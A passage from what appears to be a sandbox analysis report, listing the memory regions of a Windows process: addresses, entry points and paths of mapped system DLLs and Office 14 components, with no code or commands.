0x6f7bdfff entry_point = 0x6f770000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1067 start_va = 0x6f850000 end_va = 0x6f8c7fff entry_point = 0x6f850000 region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 1068 start_va = 0x6f8d0000 end_va = 0x6f8e5fff entry_point = 0x6f8d0000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 1069 start_va = 0x70200000 end_va = 0x70250fff entry_point = 0x70200000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1070 start_va = 0x70510000 end_va = 0x7053bfff entry_point = 0x70510000 region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 1071 start_va = 0x70550000 end_va = 0x70555fff entry_point = 0x70550000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 1072 start_va = 0x70560000 end_va = 0x705cffff entry_point = 0x70560000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 1073 start_va = 0x705d0000 end_va = 0x705dafff entry_point = 0x705d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1074 start_va = 0x705e0000 end_va = 0x705e8fff entry_point = 0x705e0000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 1075 start_va = 0x705f0000 end_va = 0x70659fff entry_point = 0x705f0000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 1076 start_va = 0x70660000 end_va = 0x70ec3fff entry_point = 0x70660000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~1\\office14\\1033\\grooveintlresource.dll") Region: id = 1077 start_va = 0x70ed0000 end_va = 0x712e9fff entry_point = 0x70ed0000 region_type = mapped_file name = "office.odf" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\progra~1\\common~1\\micros~1\\office14\\cultures\\office.odf") Region: id = 1078 start_va = 0x712f0000 end_va = 0x7131afff entry_point = 0x712f0000 region_type = mapped_file name = "atl90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\ATL90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\atl90.dll") Region: id = 1079 start_va = 0x71320000 end_va = 0x713adfff entry_point = 0x71320000 region_type = mapped_file name = "msvcp90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll") Region: id = 1080 start_va = 0x713b0000 end_va = 0x71452fff entry_point = 0x713b0000 region_type = mapped_file name = "msvcr90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 1081 start_va = 0x71460000 end_va = 0x7186afff entry_point = 0x71460000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office14\\grooveex.dll") Region: id = 1082 start_va = 0x71870000 end_va = 0x718a0fff entry_point = 0x71870000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 1083 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1084 start_va = 0x71930000 end_va = 0x71a9efff entry_point = 0x71930000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 1085 start_va = 0x71d30000 end_va = 0x71d41fff entry_point = 0x71d30000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1086 start_va = 0x71e70000 end_va = 0x71e7efff entry_point = 0x71e70000 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 1087 start_va = 0x71f90000 end_va = 0x72072fff entry_point = 0x71f90000 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 1088 start_va = 0x72080000 end_va = 0x720b9fff entry_point = 0x72080000 region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 1089 start_va = 0x720c0000 end_va = 0x72191fff entry_point = 0x720c0000 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 1090 start_va = 0x721b0000 end_va = 0x721dafff entry_point = 0x721b0000 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 1091 start_va = 0x721e0000 end_va = 0x7222efff entry_point = 0x721e0000 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 1092 start_va = 0x72230000 end_va = 0x72293fff entry_point = 0x72230000 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 1093 start_va = 0x722a0000 end_va = 0x72359fff entry_point = 0x722a0000 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 1094 start_va = 0x72360000 end_va = 0x7239bfff entry_point = 0x72360000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1095 start_va = 0x723a0000 end_va = 0x7244ffff entry_point = 0x723a0000 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 1096 start_va = 0x724a0000 end_va = 0x724cdfff entry_point = 0x724a0000 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 1097 start_va = 0x724d0000 end_va = 0x724d9fff entry_point = 0x724d0000 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1098 start_va = 0x724e0000 end_va = 0x72504fff entry_point = 0x724e0000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1099 start_va = 0x72510000 end_va = 0x72557fff entry_point = 0x72510000 region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 1100 start_va = 0x72560000 end_va = 0x72565fff entry_point = 0x72560000 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 1101 start_va = 0x72570000 end_va = 0x72585fff entry_point = 0x72570000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1102 start_va = 0x72590000 end_va = 0x725dcfff entry_point = 0x72590000 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 1103 start_va = 0x727c0000 end_va = 0x727d6fff entry_point = 0x727c0000 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 1104 start_va = 0x727e0000 end_va = 0x7298dfff entry_point = 0x727e0000 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 1105 start_va = 0x72990000 end_va = 0x729bafff entry_point = 0x72990000 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 1106 start_va = 0x729c0000 end_va = 0x729dcfff entry_point = 0x729c0000 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 1107 start_va = 0x729e0000 end_va = 0x72c44fff entry_point = 0x729e0000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1108 start_va = 0x72c50000 end_va = 0x72cb3fff entry_point = 0x72c50000 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 1109 start_va = 0x72cc0000 end_va = 0x72d23fff entry_point = 0x72cc0000 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 1110 start_va = 0x72d30000 end_va = 0x72de6fff entry_point = 0x72d30000 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 1111 start_va = 0x72df0000 end_va = 0x72e83fff entry_point = 0x72df0000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 1112 start_va = 0x73050000 end_va = 0x7325dfff entry_point = 0x73050000 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 1113 start_va = 0x732c0000 end_va = 0x732cdfff entry_point = 0x732c0000 region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 1114 start_va = 0x732d0000 end_va = 0x73309fff entry_point = 0x732d0000 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 1115 start_va = 0x733a0000 end_va = 0x733a7fff entry_point = 0x733a0000 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 1116 start_va = 0x733b0000 end_va = 0x733bffff entry_point = 0x733b0000 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 1117 start_va = 0x733d0000 end_va = 0x733eafff entry_point = 0x733d0000 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 1118 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1119 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1120 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1121 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1122 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1123 start_va = 0x73870000 end_va = 0x73879fff entry_point = 0x73870000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1124 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1125 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1126 start_va = 0x739e0000 end_va = 0x73a5cfff entry_point = 0x739e0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1127 start_va = 0x73b40000 end_va = 0x73b46fff entry_point = 0x73b40000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1128 start_va = 0x73b50000 end_va = 0x73b74fff entry_point = 0x73b50000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1129 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1130 start_va = 0x73c30000 end_va = 0x73c3efff entry_point = 0x73c30000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1131 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1132 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1133 start_va = 0x73c80000 end_va = 0x73c86fff entry_point = 0x73c80000 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 1134 start_va = 0x73c90000 end_va = 0x73ca3fff entry_point = 0x73c90000 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 1135 start_va = 0x73cb0000 end_va = 0x73cb7fff entry_point = 0x73cb0000 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 1136 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1137 start_va = 0x73d80000 end_va = 0x73e7afff entry_point = 0x73d80000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1138 start_va = 0x73e80000 end_va = 0x73eaefff entry_point = 0x73e80000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1139 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1140 start_va = 0x73ed0000 end_va = 0x73f08fff entry_point = 0x73ed0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1141 start_va = 0x73f10000 end_va = 0x73f18fff entry_point = 0x73f10000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1142 start_va = 0x73f20000 end_va = 0x73f57fff entry_point = 0x73f20000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 1143 start_va = 0x73f60000 end_va = 0x73f8efff entry_point = 0x73f60000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 1144 start_va = 0x73f90000 end_va = 0x74041fff entry_point = 0x73f90000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 1145 start_va = 0x74050000 end_va = 0x741dffff entry_point = 0x74050000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 1146 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1147 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1148 start_va = 0x74320000 end_va = 0x74331fff entry_point = 0x74320000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1149 start_va = 0x74340000 end_va = 0x7435dfff entry_point = 0x74340000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1150 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1151 start_va = 0x74500000 end_va = 0x745f7fff entry_point = 0x74500000 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 1152 start_va = 0x74600000 end_va = 0x747b6fff entry_point = 0x74600000 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 1153 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1154 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1155 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1156 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1157 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1158 start_va = 0x75010000 end_va = 0x75051fff entry_point = 0x75010000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1159 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1160 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1161 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1162 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1163 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1164 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1165 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1166 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1167 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1168 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1169 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1170 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1171 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1172 start_va = 0x75650000 end_va = 0x7567cfff entry_point = 0x75650000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1173 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1174 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1175 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1176 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1177 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1178 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1179 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1180 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1181 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1182 start_va = 0x76650000 end_va = 0x76744fff entry_point = 0x76650000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1183 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1184 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1185 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1186 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1187 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1188 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1189 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1190 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 